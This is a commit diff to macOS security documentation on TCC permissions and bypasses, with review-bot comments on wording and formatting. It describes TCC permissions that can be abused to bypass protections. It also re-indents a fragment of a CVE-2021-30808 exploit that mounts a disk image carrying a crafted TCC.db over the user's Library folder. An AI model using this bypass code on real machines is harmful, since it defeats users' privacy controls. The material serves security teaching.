GITBOOK-4124: change request with no subject merged in GitBook
carlospolop authored and gitbook-bot committed Oct 15, 2023
1 parent 327e4e0 commit feebc0c
Showing 4 changed files with 43 additions and 13 deletions.
2 changes: 1 addition & 1 deletion SUMMARY.md
Original file line number Diff line number Diff line change
@@ -185,7 +185,7 @@
* [macOS TCC](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md)
* [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md)
* [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md)
* [macOS Dangerous Entitlements](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
* [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md)
* [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md)
* [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md)
* [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md)
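Review bot: the new sidebar title on this line abbreviates to "TCC perms" while every neighbouring SUMMARY entry spells its words out ("macOS TCC Bypasses", "macOS Dangerous Entitlements"); consider "macOS Dangerous Entitlements & TCC Permissions" here, and use the identical wording in the page's H1 so the sidebar label and the document title stay in sync.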
@@ -1,4 +1,4 @@
# macOS Dangerous Entitlements
# macOS Dangerous Entitlements & TCC perms

<details>

@@ -38,6 +38,22 @@ This entitlement allows to **load frameworks, plug-ins, or libraries without bei

This entitlement allows to **use DYLD environment variables** that could be used to inject libraries and code. Check [**this for more info**](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables).

### **`kTCCServiceSystemPolicyAllFiles`**

Gives **Full Disk Access** permissions, one of the TCC highest permissions you can have.

### **`kTCCServiceAppleEvents`**

Allows the app to send events to other applications that are commonly used for **automating tasks**. Controlling other apps, it can abuse the permissions granted to these other apps.

### **`kTCCServiceSystemPolicySysAdminFiles`**

Allows to **change** the **`NFSHomeDirectory`** attribute of a user that changes his home folder and therefore allows to **bypass TCC**.

### **`kTCCServiceSystemPolicyAppBundles`**

Allow to modify apps inside their folders (inside app.app), which is disallowed by default.

## Medium

### `com.apple.security.cs.allow-jit`
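Review bot: the four new `kTCCService…` headings are TCC service identifiers (the names TCC uses for a permission in its database), not code-signing entitlements like the `com.apple.security.cs.*` headings they are placed between, yet they are added to the same "High" list with no lead-in, so a reader will look for them in an app's entitlements and not find them. Suggest a one-line intro before `### **`kTCCServiceSystemPolicyAllFiles`**` stating that what follows are TCC permissions granted by the user or an MDM profile rather than entitlements, and tightening the descriptions while here: "changes his home folder" should read "changes that user's home folder", "Controlling other apps, it can abuse the permissions granted to these other apps" should read "by controlling other apps it can abuse the permissions granted to them", and "Allow to modify apps inside their folders (inside app.app), which is disallowed by default" should read "Allows modifying the contents of app bundles (inside the .app folder), which is disallowed by default".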
@@ -26,7 +26,7 @@ It's also possible to **grant apps access** to files by **explicit intents** fro

There is a **user-mode tccd** running per logged in user defined in `/System/Library/LaunchAgents/com.apple.tccd.plist` registering the mach services `com.apple.tccd` and `com.apple.usernotifications.delegate.com.apple.tccd`.

Here you cna see the tccd running as system and as user:
Here you can see the tccd running as system and as user:

```bash
ps -ef | grep tcc
@@ -36,15 +36,17 @@ ps -ef | grep tcc

Permissions are **inherited from the parent** application and the **permissions** are **tracked** based on the **Bundle ID** and the **Developer ID**.

### TCC Database
### TCC DatabaseS

The selections is then stored in the TCC system-wide database in **`/Library/Application Support/com.apple.TCC/TCC.db`** or in **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** for per-user preferences. The databases are **protected from editing with SIP**(System Integrity Protection), but you can read them.

{% hint style="danger" %}
The TCC database in iOS is in **`/private/var/mobile/Library/TCC/TCC.db`**
The TCC database in **iOS** is in **`/private/var/mobile/Library/TCC/TCC.db`**
{% endhint %}

Moreover, a process with **full disk access** can **edit the user-mode** database.
There is a **third** TCC database in **`/var/db/locationd/clients.plist`** to indicate clients allowed to **access location services**.

Moreover, a process with **full disk access** can **edit the user-mode** database. Now an app also needs **FDA** to **read** the database.

{% hint style="info" %}
The **notification center UI** can make **changes in the system TCC database**:
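Review bot: the added heading reads `### TCC DatabaseS` with a capital S, which renders literally as "DatabaseS"; it should be `### TCC Databases`. More importantly, the unchanged paragraph directly below it still says the databases are "protected from editing with SIP ... but you can read them", while the added sentence at the end of the hunk states "Now an app also needs **FDA** to **read** the database"; as written the two contradict each other. Suggest updating the earlier sentence in this same change so it says reading also requires Full Disk Access (and from which macOS version, if known), or qualifying the new sentence with which of the two databases it applies to. Finally, the new line calls `/var/db/locationd/clients.plist` a "third TCC database"; the path is a plist, not a TCC.db sqlite file, so "a separate plist listing the clients allowed to access location services" is more precise.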
@@ -123,6 +125,16 @@ Nota that even if one of the databases are inside the users home, **users cannot
However, remember that users _can_ **delete or query rules** using **`tccutil`** .&#x20;
{% endhint %}
#### Reset
```bash
# You can reset all the permissions given to an application with
tccutil reset All app.some.id
# Reset the permissions granted to all apps
tccutil reset All
```
### TCC Signature Checks
The TCC **database** stores the **Bundle ID** of the application, but it also **stores** **information** about the **signature** to **make sure** the App asking to use the a permission is the correct one.
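Review bot: the added `#### Reset` heading and its fenced block are placed hard against the `{% endhint %}` line above and the `### TCC Signature Checks` heading below with no blank lines, and `#### Reset` is a fourth-level heading with no `###` parent of its own in this hunk; add a blank line before `#### Reset`, one after the closing fence, and consider making it `### Reset permissions with tccutil` so it sits at the same level as the sections around it. Since the hunk already touches the hint right above, the typo in the context line "Nota that even if one of the databases are inside the users home" ("Note that even if one of the databases is inside the user's home") could be fixed in the same change.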
@@ -206,7 +218,9 @@ The extended attribute `com.apple.macl` **can’t be cleared** like other extend
### TCC Bypasses
{% content-ref url="macos-tcc-bypasses/" %}
[macos-tcc-bypasses](macos-tcc-bypasses/)
{% endcontent-ref %}
## References
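Review bot: the new `### TCC Bypasses` heading and its `{% content-ref %}` block are inserted with no blank line separating them from each other, from the `com.apple.macl` paragraph above, or from `## References` below; add blank lines around the heading and the content-ref block so the Markdown renders reliably.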
@@ -392,12 +392,12 @@ hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg
```python
# This was the python function to create the dmg
def create_dmg():
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
```

Check the **full exploit** in the [**original writeup**](https://theevilbit.github.io/posts/cve-2021-30808/).
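Review bot: the six removed and six re-added `os.system(...)` lines are textually identical in this view, so the hunk appears to be a whitespace-only change (indenting the body under `def create_dmg():`, which the rendered diff here does not show); that is the right fix, since an unindented body after `def` is a syntax error, but please confirm nothing else changed. Nothing beyond indentation should be altered in this block, because the comment and the line below credit it as the function from the linked writeup; a one-line note under the block that it expects `/tmp/TCC.db` to have been prepared beforehand would help readers who copy it.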

0 comments on commit feebc0c
